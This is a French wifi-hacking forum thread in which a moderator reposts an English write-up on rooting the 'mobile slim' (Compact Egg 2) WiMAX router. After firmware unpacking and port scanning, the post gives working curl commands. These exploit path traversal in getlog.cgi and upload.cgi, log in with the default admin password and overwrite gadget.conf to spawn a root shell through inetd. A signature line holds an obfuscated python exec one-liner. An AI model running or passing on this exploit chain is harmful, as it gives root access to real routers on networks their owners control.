Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 20-11-2013 18:21:11

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

How to root 'mobile slim' wimax router, a.k.a. 'compact egg 2'.

Récupéré de pastebin, je n'ai pas trouvé de source.
Il me semble que la page a été détruite, aussi la voici :

C'est sympa, ils expliquent leur méthode.

How to root 'mobile slim' wimax router, a.k.a. 'compact egg 2'.
# DONT DO IT THOUGH ! It's ... bad; maybe.

Just give me the hack ! => http://pastebin.com/eJExeRp9


  === WRITEUP ===

We work on Debian Linux and Arch Linux. Many thanks to the community !

As of today :
- software version for 'mobile slim' is 2324-2000-1097
- file available on http://updatems.nwcs.co.jp/update/mobileslim/IMW-C1012W_V2324_R1097KR.bin

# DONT DO IT ! Maybe you will be holding a warranty-void wibrick. Plus it's probably against the TPP.

1/ Target information gathering : Mobile Slim is Compact Egg2 (=CE2)
    INFOMARK is the real maker, see back of the device. 
    Most similar product on INFOMARK's (horrible flash hell) website is the CE2.

    CE2 is the 'Compact Egg' new iteration.
    Clearwire's iSpot was egg-based : some security holes.
    We start here : https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt

    We have some common ground : webmain.cgi is still present, we seem to be running
    the same framework, we still see thttpd 2.25b.
    BUT the weak fonctions (act_cmd_result & configuration restore functions) are gone.
    Similarly upgrademain.cgi was removed from the cgi-bin directory and 
    telnet is absent from the busybox build. We will need to dig deeper.

2/ CE2 firmware
    Here is the CE2 firmware on INFOMARK's website :
http://www.infomark.co.kr/compactegg2/sub.php?goPage=board&boardid=1303694551_3&mode=view&no=11&start=&search_item=&search_order=&menu_code=2/7&boardcate=

3/ binwalk
    https://github.com/devttys0/binwalk

    Binwalk v1.2.3
    Craig Heffner, http://www.devttys0.com

    % binwalk B3000_V2344_R1095KR.bin
    DECIMAL         HEX             DESCRIPTION
    400             0x190           uImage header, header size: 64 bytes, header CRC: 0x2561261A, created: Mon Jun 24 17:08:36 2013, image size: 1145768 bytes, Data Address: 0xD0600000, Entry Point: 0xD0600000, data CRC: 0x74417F3E, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: "Linux-2.6.38-uc0"

    16878           0x41EE          gzip compressed data, maximum compression, from Unix, last modified: Mon Jun 24 17:08:36 2013

    1147280         0x118190        Squashfs filesystem, big endian, version 2.1, size: 4654686 bytes, 916 inodes, blocksize: 65536 bytes, created: Mon Jun 24 17:13:07 2013 

    % binwalk --dd=squashfs:sqfs B3000_V2344_R1095KR.bin

4/ Firmware modkit
    https://code.google.com/p/firmware-mod-kit/

    We tried all versions of unsquashfs, starting at 2.1. They all failed.
    We tried to roll our own, we compiled tons of stuff, we fuzzed the blocks, etc, no luck ...

5/ squash7z
    We went back to binwalk.

    % binwalk B3000_V2344_R1095KR.bin -S
    DECIMAL         HEX             Strings
    80              0x50            IMW-C1001W
    128             0x80            uImage
    192             0xC0            ramdisk.squashfs7z
    432             0x1B0           Linux-2.6.38-uc0
    16215           0x3F57          Attempting division by 0!
    16241           0x3F71          Uncompressing Linux...
    [...]

    We google for 'squashfs7z', find this :
    https://code.oregonstate.edu/svn/dsp_bd/uclinux-dist/trunk/vendors/CyberGuard/vendor.mak

    We clone the repo, build the tools. They don't provide unsquashfs, we pull the source from
    another squashfs-tools distribution channel and link it in the same way they link mksquashfs.
    It works ! Very happy moment.

6/ magent - cal - getlog - webmain
    We nmaped the 'mobile slim' a long time ago, trying to find open stuff. We tried to fuzz the
    dhcpd server, we know the dns server is vulnerable to cache poisoning, we saw some stuff coming 
    out of the wimax calibration tool. We tried all the known vulns in thttpd. Impervious !
    We are no longer friends.

    % sudo nmap 192.168.1.1 -O -p1-65535
    [...]
    PORT     STATE SERVICE
    53/tcp   open  domain
    80/tcp   open  http
    8182/tcp open  unknown
    9800/tcp open  unknown
    9801/tcp open  unknown
    [...]

    We start up hex-rays.com's IDA Disassembler & try to get into 'magent' (on port 8281). Useless.

    Next we focus on webmain.cgi, and the other cgi-scripts.
    Oh. We can read files on the device with getlog.cgi !

    We read the OTA upgrade system configuration file & get the mobile slim own firmware files.
    Network Consulting does not give urls for their upgrade files, ケチ. Let's release them !

7/ shell
    We take a look at upgrade.cgi next. Oh, we can push files wherever.
    We push to /system/etc/gadget.conf. Same stuff as before, plus 2 lines, granting us
    a shell through inetd.
    The scintillating smart Mobile sweetness is full of small stars !


  === EXPLOIT CODE ===

So with curl, the exploit is :

# curl -O http://192.168.1.1/cgi-bin/getlog.cgi?filename=../../system/etc/gadget.conf
# and remove html marking
# or use gadget.conf from IMW-C1012W_V2324_R1097KR.bin 
# https://mega.co.nz/#!sJRgAILS
# key:FnfoVik0PYq23Czx90QEaR-aECVosEEY6pK0joHj4Z8

# drill
cat >>gadget.conf <<EOF 
echo "telnet stream tcp nowait root /bin/sh sh -i" > /tmp/an_awkward_situation
/usr/sbin/inetd /tmp/an_awkward_situation &
EOF

# login
curl -b "acc=1; login_page=/; language=en; uirp=3000" "http://192.168.1.1/cgi-bin/webmain.cgi?act=login&passwd=YWRtaW4%3D&login=login" -c mobile_slim.cookies.txt

# and push
curl -b "acc=1; login_page=/; language=en; uirp=3000" "http://192.168.1.1/cgi-bin/upload.cgi" -b mobile_slim.cookies.txt -F "act=upgrade" -F "type=type_skin" -F '[email protected];filename=../../system/etc/gadget.conf' --trace -

There are other security problems. Please do not open the admin pages to the outside world.

Also, small win from our lurking around in the filesystem, there is stuff to be seen here : 
http://192.168.1.1/private/menu_engineer.html


  === FILES ===

The files, this is educational content, it does not help acquiring root. See above link.

* Upgrade files (==.bin) / content of filesystem (==.tar.?z): 

    B3000_V2344_R1095KR.bin 5.5 MB
    https://mega.co.nz/#!gNZjFDTB
    key:dfHQpWJLjdCMfJMOyHYbkGv90M4p7kZnzDH398rTJZw

    B3000_V2344_R1095KR.bin.squashfs-root.tar.gz 5.5 MB
    https://mega.co.nz/#!5MZkCKQY
    key:STF_w2eVd0NNHF_AVUyZfCKqaZkNnAtie5Ew4y0XRI8


    IMW-C1012W_V2324_R1097KR.bin 6.0 MB
    https://mega.co.nz/#!IIgk0JJI
    key:BvZKJR5-aOSzCwfzjvW35mBYJphncNG6tsttvJP12Bk

    IMW-C1012W_V2324_R1097KR.bin.squashfs-root.tar.xz 3.7 MB
    https://mega.co.nz/#!BV4XVB4Y
    key:RQopOjN6QhqTz3fWbMxq3hT3JIwjNq0mn9H6uzE9k1Q

* Archived websites : 
    https://mega.co.nz/#F!tNJHiDyT
    key:HZfEuhpTrjJlJM5xZMyFRg

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 20-11-2013 19:12:21

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : How to root 'mobile slim' wimax router, a.k.a. 'compact egg 2'.

Merci Spawn wink


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.028 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]